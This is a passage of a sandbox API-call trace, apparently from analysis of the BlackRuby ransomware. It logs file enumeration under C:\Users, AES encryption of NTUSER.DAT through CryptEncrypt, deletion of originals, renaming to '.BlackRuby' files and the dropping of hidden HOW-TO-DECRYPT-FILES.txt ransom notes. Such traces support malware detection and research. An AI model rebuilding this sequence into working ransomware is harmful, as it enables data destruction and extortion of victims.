(hFile=0x184) returned 0x1 [0048.257] SetErrorMode (uMode=0x0) returned 0x1 [0048.257] GetFileType (hFile=0x184) returned 0x1 [0048.259] CloseHandle (hObject=0x184) returned 1 [0048.259] GetLastError () returned 0xb7 [0048.259] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", lpFilePart=0x0) returned 0x36 [0048.259] GetLastError () returned 0xb7 [0048.259] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\Encrypted_xnVV3GFCUHAhYjcKtPsdP5kZUaLHKYxZjsFteibVS.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Sun\\Java\\Java Update\\Encrypted_xnVV3GFCUHAhYjcKtPsdP5kZUaLHKYxZjsFteibVS.BlackRuby", lpFilePart=0x0) returned 0x65 [0048.259] GetLastError () returned 0xb7 [0048.259] SetErrorMode (uMode=0x1) returned 0x0 [0048.259] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70634730, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x70634730, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x24f80fa0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x180)) returned 1 [0048.259] GetLastError () returned 0xb7 [0048.259] SetErrorMode (uMode=0x0) returned 0x1 [0048.259] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\Encrypted_xnVV3GFCUHAhYjcKtPsdP5kZUaLHKYxZjsFteibVS.BlackRuby" (normalized: "c:\\users\\all users\\sun\\java\\java update\\encrypted_xnvv3gfcuhahyjcktpsdp5kzualhkyxzjsfteibvs.blackruby")) returned 1 [0048.260] GetLastError () returned 0xb7 [0048.260] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Sun\\Java\\Java Update\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.260] GetLastError () returned 0xb7 [0048.260] SetErrorMode (uMode=0x1) returned 0x0 [0048.260] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\sun\\java\\java update\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.270] GetLastError () returned 0x0 [0048.270] GetFileType (hFile=0x184) returned 0x1 [0048.270] SetErrorMode (uMode=0x0) returned 0x1 [0048.270] GetFileType (hFile=0x184) returned 0x1 [0048.272] CloseHandle (hObject=0x184) returned 1 [0048.272] GetLastError () returned 0x0 [0048.272] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Sun\\Java\\Java Update\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.272] GetLastError () returned 0x0 [0048.272] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.272] GetLastError () returned 0x0 [0048.272] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Templates", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Templates", lpFilePart=0x0) returned 0x1c [0048.272] GetLastError () returned 0x0 [0048.272] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.272] GetLastError () returned 0x0 [0048.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.272] GetLastError () returned 0x0 [0048.272] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Templates", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Templates", lpFilePart=0x0) returned 0x1c [0048.272] GetLastError () returned 0x0 [0048.272] SetErrorMode (uMode=0x1) returned 0x0 [0048.272] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Templates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.272] GetLastError () returned 0x5 [0048.273] SetErrorMode (uMode=0x0) returned 0x1 [0048.273] GetFullPathNameW (in: lpFileName="C:\\Users\\Default", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default", lpFilePart=0x0) returned 0x10 [0048.273] GetLastError () returned 0x5 [0048.274] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.274] GetLastError () returned 0x5 [0048.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.274] GetLastError () returned 0x5 [0048.274] GetFullPathNameW (in: lpFileName="C:\\Users\\Default", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default", lpFilePart=0x0) returned 0x10 [0048.274] GetLastError () returned 0x5 [0048.274] SetErrorMode (uMode=0x1) returned 0x0 [0048.274] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0048.274] GetLastError () returned 0x5 [0048.274] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.274] GetLastError () returned 0x5 [0048.274] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.274] GetLastError () returned 0x5 [0048.274] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.274] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.275] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.275] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.276] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.276] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.277] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.277] GetLastError () returned 0x5 [0048.278] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.278] GetLastError () returned 0x5 [0048.278] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.278] GetLastError () returned 0x5 [0048.278] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.278] GetLastError () returned 0x5 [0048.278] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.278] GetLastError () returned 0x5 [0048.278] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.278] GetLastError () returned 0x5 [0048.278] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.278] GetLastError () returned 0x5 [0048.279] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.279] GetLastError () returned 0x5 [0048.279] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.279] GetLastError () returned 0x12 [0048.279] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0048.279] SetErrorMode (uMode=0x0) returned 0x1 [0048.279] GetFullPathNameW (in: lpFileName="C:\\Users\\Default", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default", lpFilePart=0x0) returned 0x10 [0048.279] GetLastError () returned 0x12 [0048.279] SetErrorMode (uMode=0x1) returned 0x0 [0048.279] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0048.279] GetLastError () returned 0x12 [0048.279] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.279] GetLastError () returned 0x12 [0048.279] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.279] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.280] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.280] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.281] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.281] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.282] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.282] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.283] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.283] GetLastError () returned 0x12 [0048.284] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.284] GetLastError () returned 0x12 [0048.284] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.284] GetLastError () returned 0x12 [0048.284] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0048.284] SetErrorMode (uMode=0x0) returned 0x1 [0048.284] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.284] GetLastError () returned 0x12 [0048.284] SetErrorMode (uMode=0x1) returned 0x0 [0048.284] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x1bbf190 | out: lpFileInformation=0x1bbf190*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xe87815c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x7b6f310, ftLastWriteTime.dwHighDateTime=0x1d2da0d, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0048.285] GetLastError () returned 0x12 [0048.285] SetErrorMode (uMode=0x0) returned 0x1 [0048.285] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.285] GetLastError () returned 0x12 [0048.285] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e894, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.285] GetLastError () returned 0x12 [0048.285] SetErrorMode (uMode=0x1) returned 0x0 [0048.285] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.285] GetLastError () returned 0x0 [0048.285] GetFileType (hFile=0x184) returned 0x1 [0048.286] SetErrorMode (uMode=0x0) returned 0x1 [0048.286] GetFileType (hFile=0x184) returned 0x1 [0048.286] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ee48 | out: lpFileSizeHigh=0x18ee48*=0x0) returned 0x80000 [0048.286] GetLastError () returned 0x0 [0048.289] ReadFile (in: hFile=0x184, lpBuffer=0x2db5870, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x18edf0, lpOverlapped=0x0 | out: lpBuffer=0x2db5870*, lpNumberOfBytesRead=0x18edf0*=0x80000, lpOverlapped=0x0) returned 1 [0048.294] GetLastError () returned 0x0 [0048.294] CloseHandle (hObject=0x184) returned 1 [0048.294] GetLastError () returned 0x0 [0048.297] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.297] GetLastError () returned 0x0 [0048.297] SetErrorMode (uMode=0x1) returned 0x0 [0048.297] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x18ee58 | out: lpFileInformation=0x18ee58*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xe87815c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x7b6f310, ftLastWriteTime.dwHighDateTime=0x1d2da0d, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0048.298] GetLastError () returned 0x0 [0048.298] SetErrorMode (uMode=0x0) returned 0x1 [0048.298] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e9c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.298] GetLastError () returned 0x0 [0048.298] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT", dwFileAttributes=0x2024) returned 1 [0048.298] GetLastError () returned 0x0 [0048.298] CryptAcquireContextW (in: phProv=0x18edb8, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18edb8*=0x37c790) returned 1 [0048.298] GetLastError () returned 0x0 [0048.330] CryptImportKey (in: hProv=0x37c790, pbData=0x1c1b5b8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed94 | out: phKey=0x18ed94*=0x360fa0) returned 1 [0048.330] GetLastError () returned 0x0 [0048.330] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.330] GetLastError () returned 0x0 [0048.335] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.335] GetLastError () returned 0x0 [0048.335] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ed50 | out: phKey=0x18ed50*=0x360b20) returned 1 [0048.335] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.335] GetLastError () returned 0x0 [0048.335] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1c48604*=0x1, dwFlags=0x0) returned 1 [0048.335] GetLastError () returned 0x0 [0048.335] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1c485d0, dwFlags=0x0) returned 1 [0048.335] GetLastError () returned 0x0 [0048.360] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ae8450*, pdwDataLen=0x18ede0*=0x80100, dwBufLen=0x80100 | out: pbData=0x2ae8450*, pdwDataLen=0x18ede0*=0x80100) returned 1 [0048.364] GetLastError () returned 0x0 [0048.366] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b22808*, pdwDataLen=0x18edf8*=0x10, dwBufLen=0x10 | out: pbData=0x1b22808*, pdwDataLen=0x18edf8*=0x10) returned 1 [0048.366] GetLastError () returned 0x0 [0048.366] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b22838*, pdwDataLen=0x18ee00*=0x0, dwBufLen=0x10 | out: pbData=0x1b22838*, pdwDataLen=0x18ee00*=0x10) returned 1 [0048.366] GetLastError () returned 0x0 [0048.372] CryptDestroyKey (hKey=0x360fa0) returned 1 [0048.372] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0048.372] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0048.372] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e89c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.372] GetLastError () returned 0x0 [0048.372] SetErrorMode (uMode=0x1) returned 0x0 [0048.372] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.372] GetLastError () returned 0x5 [0048.373] SetErrorMode (uMode=0x0) returned 0x1 [0048.373] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT", lpFilePart=0x0) returned 0x1b [0048.373] GetLastError () returned 0x5 [0048.373] DeleteFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat")) returned 1 [0048.378] GetLastError () returned 0x5 [0048.379] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.379] GetLastError () returned 0x5 [0048.379] SetErrorMode (uMode=0x1) returned 0x0 [0048.379] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.379] GetLastError () returned 0x0 [0048.379] GetFileType (hFile=0x184) returned 0x1 [0048.379] SetErrorMode (uMode=0x0) returned 0x1 [0048.379] GetFileType (hFile=0x184) returned 0x1 [0048.379] WriteFile (in: hFile=0x184, lpBuffer=0x1b3d930*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1b3d930*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0048.380] GetLastError () returned 0x0 [0048.380] CloseHandle (hObject=0x184) returned 1 [0048.380] GetLastError () returned 0x0 [0048.380] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.380] GetLastError () returned 0x0 [0048.380] SetFileAttributesW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.381] GetLastError () returned 0x0 [0048.381] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.381] GetLastError () returned 0x0 [0048.381] SetErrorMode (uMode=0x1) returned 0x0 [0048.381] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), fInfoLevelId=0x0, lpFileInformation=0x1b3f584 | out: lpFileInformation=0x1b3f584*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4c6063a4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x82363a0a, ftLastAccessTime.dwHighDateTime=0x1ca0458, ftLastWriteTime.dwLowDateTime=0x82389c62, ftLastWriteTime.dwHighDateTime=0x1ca0458, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0048.381] GetLastError () returned 0x0 [0048.381] SetErrorMode (uMode=0x0) returned 0x1 [0048.381] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.381] GetLastError () returned 0x0 [0048.381] GetFullPathNameW (in: 